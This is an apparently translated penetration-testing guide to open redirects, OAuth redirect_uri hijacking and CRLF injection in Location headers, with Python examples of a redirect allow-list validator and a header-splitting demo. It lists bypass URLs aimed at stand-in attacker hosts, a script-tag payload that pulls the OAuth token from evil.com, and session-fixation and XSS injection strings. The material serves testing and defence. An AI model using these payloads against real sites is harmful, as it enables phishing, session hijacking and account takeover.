Black-box penetration testing guidance: forwarding and redirection

  • forward (server-side forward)

    A forward is a jump made on the server. When a request arrives from the client, the server hands that same request, with its parameters and attributes, to another JSP or servlet on the same server for processing.

  • sendRedirect (redirect)

    A redirect is a jump made by the client. The server answers with a 3xx status and a Location header carrying the new URL. The parameters and other state of the original request are gone unless the server deliberately copies them into the new URL. The browser then requests the servlet or JSP at the new URL, which need not be on the original server at all.

  • Comparison of forwarding and redirection

    Forwarding happens on the server side; redirection happens on the client side.

    Forwarding is faster; redirection is slower, because it costs the browser an extra round trip.

    Forwarding stays within one request; redirection produces two separate requests.

    In a forward the target runs inside the current request and takes over the response, so any output the original handler writes afterwards is discarded; in a redirect the target runs only when the browser issues its second request.

    A forward leaves the browser's address bar unchanged; a redirect changes it to the new URL.

    A forward can only target the same server; a redirect can target any server.
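As an added illustration (example code written for this page, not taken from the article, and in Python/WSGI rather than the JSP/servlet API the article has in mind), the two mechanisms side by side: a forward hands the same request to another handler inside the server, a redirect ends the request with 302 and makes the browser start a new one. The route names /forward, /redirect and /target and the user parameter are assumptions for the demo; the contrast is the same one between RequestDispatcher.forward() and HttpServletResponse.sendRedirect() in a servlet.

```python
"""Server-side forward vs client-side redirect, shown with tiny WSGI apps."""
from urllib.parse import parse_qs


def target_app(environ, start_response):
    """The handler both mechanisms eventually hand control to."""
    params = parse_qs(environ.get("QUERY_STRING", ""))
    user = params.get("user", ["anonymous"])[0]
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [f"welcome {user}, path={environ['PATH_INFO']}".encode()]


def forward_app(environ, start_response):
    """Forward: stays inside the current request on the server.

    The same environ (query string, headers, anything this handler added)
    is passed straight to target_app. The client never sees a second request
    and its address bar still shows /forward.
    """
    environ = dict(environ, PATH_INFO="/target", FORWARDED_FROM="/forward")
    return target_app(environ, start_response)


def redirect_app(environ, start_response):
    """Redirect: ends this request with 302 + Location.

    The browser then issues a completely new request to /target. Nothing from
    the first request travels with it unless it is encoded into the Location
    URL, and the target may live on another host entirely.
    """
    start_response("302 Found", [("Location", "/target"), ("Content-Length", "0")])
    return [b""]


# Assumed routing table for the demo server.
ROUTES = {"/target": target_app, "/forward": forward_app, "/redirect": redirect_app}


def call(app, path, query=""):
    """Minimal WSGI client: returns (status, headers, body) for one request."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "QUERY_STRING": query,
               "SERVER_NAME": "localhost", "SERVER_PORT": "80",
               "wsgi.url_scheme": "http"}
    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


def follow_redirect(first_app, path, query=""):
    """What a browser does: send the request and, on 3xx, fetch Location anew.

    Returns (number_of_requests, final_body). Only path-only Location values
    are handled, which is all this demo emits.
    """
    status, headers, body = call(first_app, path, query)
    if status.startswith("3"):
        # Second request: fresh environ, original query string NOT carried over.
        status, headers, body = call(ROUTES[headers["Location"]], headers["Location"])
        return 2, body
    return 1, body


if __name__ == "__main__":
    print(follow_redirect(forward_app, "/forward", "user=alice"))    # one request, user kept
    print(follow_redirect(redirect_app, "/redirect", "user=alice"))  # two requests, user lost
```

Running it shows the practical consequence of "one request versus two": the forwarded handler still sees user=alice, while the redirected one sees a bare request and falls back to anonymous.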

I. Attack scenarios

  • Unsafe jumps

    Many applications have a jump (redirect) function, most often on the login page: a user who is not logged in is sent to the login page, and after successful authentication is sent to the main page. Another common case is the jump to a custom error page when the system raises an exception. If the target URL of such a jump can be set to an arbitrary value and the complete link is sent to a victim, the jump becomes a phishing vector.

  • Test method

    First find every jump URL in the application. Method: use the Burp Suite proxy to record all requests and responses, then search the recorded traffic for keywords such as redirect and service to locate the URLs that perform a jump.

    A jump URL typically looks like 127.0.0.1/test/test.jsp?service=http://xxx.com

    Change the value of service to any other URL, such as www.bcbccb.cn. If the application jumps there, the vulnerability is present. Some systems only restrict the target to the local network and consider that sufficient; it is not, because an attacker can stand up a phishing server inside the intranet. Where possible, enforce an allow-list so the application only ever jumps to a fixed set of URLs.

  • Bypassing URL jump checks

    If the application validates the target partially, a straight replacement of the URL may fail. Then the validation itself has to be bypassed to make the jump land on an attacker-chosen address.

    Examples of bypass scenarios:

    The host-name and IP-address forms of one server, such as http://www.bcbccb.cn and http://127.0.0.1, reach the same place but are different strings to a filter that compares text; whichever form the filter does not cover gets through.

    IP base conversion: 115.239.210.26 can also be written as the decimal integer 1945096730 or the octal integer 016373751032. The browser resolves all three forms to the same address; a filter that only recognises dotted-quad notation does not.

    Chain another redirect in the same domain, so that the outer URL points at a trusted host and only the nested parameter leaves it:

    http://www.test.com/a?url=http://www.test.com/b?url=bcbccb.cn

  • Exploiting host-parsing differences between the backend and the browser

    Different browser engines can parse a different host out of the same unusual URL, and the backend's own parser may differ from all of them. Crafted URLs exploit that gap: the backend approves one host, the browser connects to another.

    For example, take the parameter:

    url=http://www.bcbccb.cn\test.com/index.php

    Backend: host = test.com (what a loose check extracts, for instance a regular expression that picks out the last domain name before the first slash)

    Browsers parse a different host from the same string. Engines that follow the WHATWG URL standard treat a backslash in an http URL as a forward slash, so they see the host www.bcbccb.cn and the path /test.com/index.php. Opening the link in such a browser lands the user on bcbccb.cn even though the backend believed it had approved test.com.

  • URL redirection in OAuth2.0

    OAuth is an open standard that lets a user authorize a third-party site to access data the user keeps at another service provider, without giving the third party their username and password or access to all of their data.

    In the OAuth authorization flow, the authorization server delivers the user's authorization code (or token) to the address named in redirect_uri. If an attacker can substitute their own address for redirect_uri and lure the user into sending that request, the code is delivered to the attacker's callback instead. The attacker then uses it to log in as the user: authorization hijacking.

  1. The authorization server does not validate redirect_uri at all, so it can be pointed straight outside the main domain.

    http://api.weibo.com/oauth2/authorize?client_id=123456&…&redirect_uri=http://account.youku.com/partner_thirdLoginCallback/tlsite_weibo

    http://api.weibo.com/oauth2/authorize?client_id=123456&…&redirect_uri=http://www.bcbccb.cn

  2. Exploit host-parsing differences between the authorization server and the browser

    For example:

    redirect_uri=auth.app.com.evil.com

    Authorization server:

    host=app.com

    Browser:

    host=evil.com

    Further examples. Each one mixes the trusted name auth.app.com with evil.com in a way that one URL parser reads differently from another; the bypass works whenever the server's parser and the browser disagree in the attacker's favour:

    auth.app.com.evil.com (trusted name as a prefix of an attacker-owned domain)

    evil.com?auth.app.com (trusted name in the query string)

    evil.com?@auth.app.com (an @ after the ? belongs to the query, not to userinfo)

    auth.app.com@evil.com (trusted name as userinfo; the real host follows the @)

    auth.app.com\@evil.com

    evil.com\auth.app.com

    evil.com:\auth.app.com

    evil.com\.auth.app.com

    evil.com:\@auth.app.com (backslash variants: browsers following the WHATWG URL standard treat \ as /, while many server-side parsers take it as an ordinary character or split on it)

  3. Subdomain controllable

    The callback address is validated against the primary domain, but the platform lets third parties register subdomains of it.

    http://api.weibo.com/oauth2/authorize?client_id=123456&…&redirect_uri=https://account.sinaapp.com

    http://api.weibo.com/oauth2/authorize?client_id=123456&…&redirect_uri=https://evil.sinaapp.com

  4. Cross-domain: vulnerabilities inside the trusted domain

    Combine the validated redirect_uri with an open redirect or an XSS in the trusted domain, so that the code or token is passed on to the attacker, for example through the Referer header of a follow-up request or through injected script.

    redirect_uri=http://auth.app.com/redirect.php?url=evil.com

    redirect_uri=http://app.com/ajax/car.html?callback=<script src="http://evil.com?getToken.php"></script>
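An allow-list validator for redirect targets, added here as example code (written for this page, not taken from the article): it covers the plain url/service jump parameter from the test method above as well as the OAuth redirect_uri cases in items 1 to 3. The host names in ALLOWED_HOSTS and the function names are assumptions. Next to it is the loose "does a trusted name appear in the string" check that every bypass in this section defeats, so the two can be compared on the same inputs.

```python
"""Allow-list validation of redirect targets (open redirect, OAuth redirect_uri)."""
import re
from urllib.parse import urlsplit

# Exact hostnames we are willing to send a user (or an authorization code) to.
# Assumed names for this example. No suffix matching: evil.auth.app.com and
# auth.app.com.evil.com both fail, which is what the subdomain case requires.
ALLOWED_HOSTS = {"auth.app.com", "www.app.com"}

# Plain DNS syntax only: labels of letters, digits and hyphens joined by dots.
# Anything else (backslash, '@', '[', ':', '?') is a sign that some parser in
# the chain may read the URL differently from us.
HOST_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$")


def naive_is_trusted(url):
    """The check many applications actually ship: a trusted host name appears
    somewhere in the string. Every bypass in this section defeats it."""
    return any(host in url for host in ALLOWED_HOSTS)


def is_safe_redirect(url, allowed_hosts=ALLOWED_HOSTS, allow_relative=True):
    """True only if the host a browser will connect to is in allowed_hosts,
    or if the target is a same-origin relative path."""
    if not url or any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        return False          # CR/LF/NUL: header injection, not a destination
    if "\\" in url:
        return False          # browsers turn \ into /; urlsplit does not
    try:
        parts = urlsplit(url)
    except ValueError:        # e.g. unbalanced '[' in an IPv6 literal
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: exactly one leading slash keeps it on this origin.
        # ("//evil.com" gets a netloc from urlsplit and is rejected below;
        # the startswith("//") test is belt and braces.)
        return allow_relative and url.startswith("/") and not url.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False          # javascript:, data:, and scheme-relative "//host"
    if "@" in parts.netloc:
        return False          # trusted name hidden in userinfo: name@evil.com
    host = parts.hostname     # lower-cased, port stripped
    if host is None or not HOST_RE.match(host):
        return False
    return host in allowed_hosts


# Constructed test inputs: the bypass patterns from the text plus legitimate
# targets, each with the verdict the strict check should reach.
CASES = [
    ("https://auth.app.com/callback?code=abc", True),
    ("/account/home", True),
    ("HTTPS://AUTH.App.com:443/cb", True),
    ("http://auth.app.com.evil.com/", False),
    ("http://evil.com?auth.app.com", False),
    ("http://evil.com?@auth.app.com", False),
    ("http://auth.app.com@evil.com", False),
    ("http://auth.app.com\\@evil.com", False),
    ("http://evil.com\\auth.app.com", False),
    ("//evil.com", False),
    ("http://1945096730/", False),          # 115.239.210.26 as a decimal integer
    ("javascript:alert(1)", False),
    ("http://www.app.com/x\r\nSet-Cookie: a=b", False),
]


def verdicts():
    """(url, naive verdict, strict verdict, strict matches expectation) per case."""
    return [(u, naive_is_trusted(u), is_safe_redirect(u), is_safe_redirect(u) == want)
            for u, want in CASES]


if __name__ == "__main__":
    for url, naive, strict, ok in verdicts():
        print(f"{'OK ' if ok else 'BAD'} naive={naive!s:5} strict={strict!s:5} {url!r}")
```

Two limits worth keeping in mind. The validator only decides which host is reached; an allowed host that itself carries an open redirect or an XSS (item 4) still leaks the code, so the allow-list has to be kept to endpoints that are known not to forward. And for OAuth specifically, the OAuth 2.0 Security Best Current Practice calls for comparing redirect_uri with the registered value by exact string match, which is stricter still than host allow-listing and is the right choice when the callback URLs are registered up front.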

  • CRLF and URL redirection combination

    CRLF is the abbreviation for carriage return + line feed (\r\n, URL-encoded as %0d%0a).

    A URL redirect is normally expressed through the Location field of the response header. If the jump parameter is written into that header without filtering, the attacker can terminate the header line and append lines of their own: CRLF injection.

  1. Push a session identifier onto the user, a session fixation attack:

    http://www.app.com/redirect?url=http://www.baidu.com/login%0d%0aSet-Cookie:JSESSIONID=vulbox

  2. Insert two CRLF sequences to end the header block early, so that whatever follows lands in the response body; a reflected XSS:

    http://www.app.com/redirect?url=%0d%0a%0d%0a<IMG src=1 onerror=alert(/v587/)>

  3. The browser's XSS filter is a client-side defence against reflected XSS, and the response header X-XSS-Protection: 0 switches it off. The same injection can set that header before the body. (Chromium removed its XSS Auditor in version 78 and Firefox never shipped one, so this step only matters for older browsers.)

    X-XSS-Protection: 0

    http://www.app.com/redirect?url=%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<IMG src=1 onerror=alert(/v587/)>
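A worked example of the header splitting in items 1 to 3, added here as example code (Python, not the article's own): a handler that copies the url parameter straight into Location, a minimal response parser standing in for the browser, and the hardened builder. The three payloads are the ones from this section, shown already URL-decoded the way the server sees them after parsing the query string; the host names are the article's placeholders.

```python
"""CRLF injection via an unvalidated Location header, and the hardened form."""


def build_redirect_vulnerable(url):
    """Naive 302 handler: the user-supplied url lands in Location unfiltered."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {url}\r\n"
            "Content-Type: text/html\r\n"
            "\r\n")


def parse_response(raw):
    """Split a raw response as a client does: (status line, [(name, value)], body).

    Header names are lower-cased; the first blank line ends the header block,
    which is exactly what an injected double CRLF exploits.
    """
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def header_values(raw, name):
    """All values of one header in a raw response (name is case-insensitive)."""
    return [v for n, v in parse_response(raw)[1] if n == name.lower()]


def safe_location(url):
    """Reject control characters (CR, LF, NUL, ...) before they reach a header.

    Modern servers and HTTP libraries refuse such values too, but an explicit
    check lets the application log and block the attempt instead of erroring.
    """
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        raise ValueError("control character in redirect target")
    return url


def build_redirect_safe(url):
    """Same handler with the check applied."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {safe_location(url)}\r\n"
            "Content-Type: text/html\r\n"
            "\r\n")


def rejects(url):
    """True if the hardened builder refuses this target."""
    try:
        build_redirect_safe(url)
    except ValueError:
        return True
    return False


# Constructed payloads: the three from the text, URL-decoded (%0d%0a -> \r\n).
SESSION_FIXATION = "http://www.baidu.com/login\r\nSet-Cookie: JSESSIONID=vulbox"
BODY_XSS = "\r\n\r\n<IMG src=1 onerror=alert(/v587/)>"
FILTER_OFF_XSS = "\r\nX-XSS-Protection: 0\r\n\r\n<IMG src=1 onerror=alert(/v587/)>"


def demo():
    """What each payload achieves against the vulnerable handler."""
    return {
        "set_cookie": header_values(build_redirect_vulnerable(SESSION_FIXATION), "Set-Cookie"),
        "body": parse_response(build_redirect_vulnerable(BODY_XSS))[2].split("\r\n")[0],
        "xss_protection": header_values(build_redirect_vulnerable(FILTER_OFF_XSS), "X-XSS-Protection"),
    }


if __name__ == "__main__":
    print(demo())
    print("hardened rejects session-fixation payload:", rejects(SESSION_FIXATION))
```

The parser is deliberately simple, but it reproduces the two behaviours the attack relies on: a CRLF inside a header value starts a new header, and a bare CRLF pair ends the header block and turns the remainder into the body.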

II. Impact

An attacker can use such URLs for phishing, which damages the company's reputation. Because the user-supplied value ends up in a response context such as a Meta refresh, JavaScript or an HTTP header, context-specific injection vulnerabilities such as XSS can follow. The jump function is also flawed in itself, since it carries the user's browser from a trusted site to an untrusted one; if sensitive data travels with the jump, it is leaked to an untrusted third party.

Original link: https://bcbccb.cn/en/11611.html